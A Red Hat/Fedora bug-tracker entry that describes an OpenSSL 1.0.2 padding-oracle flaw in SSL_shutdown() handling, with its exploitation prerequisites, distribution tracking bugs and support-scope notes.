A vulnerability was found in OpenSSL 1.0.2. When an application encounters a fatal protocol error and then calls SSL_shutdown() twice, OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. This difference in behaviour can be detected by a remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable "non-stitched" ciphersuites must be in use. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). AEAD ciphersuites are not impacted. This issue does not impact OpenSSL 1.1.1 or 1.1.0.
Created compat-openssl10 tracking bugs for this issue:
Affects: fedora-all [bug 1683808]
Created mingw-openssl tracking bugs for this issue:
Affects: epel-7 [bug 1683806]
Affects: fedora-all [bug 1683805]
Created openssl tracking bugs for this issue:
Affects: fedora-all [bug 1683807]
This is essentially a padding oracle flaw, which needs the following conditions for exploitation:
1. Non-stitched cipher suites are used. (https://software.intel.com/en-us/articles/improving-openssl-performance talks about stitching cipher suites)
2. AES-NI is not used.
3. Applications must call SSL_shutdown() twice even if a protocol error has occurred
4. The attacker must be able to run a script in the victim's browser which sends requests to a vulnerable website. This can be achieved tempting the victim to visit a malicious website. Second, the attacker must be able to modify requests sent by the browser and observe the server behavior. The second prerequisite is much harder to achieve, because the attacker must be an active Man-in-the-Middle.
This vulnerability is out of security support scope for the following product:
* Red Hat JBoss Web Server 3
Please refer to https://access.redhat.com/support/policy/updates/jboss_notes for more details.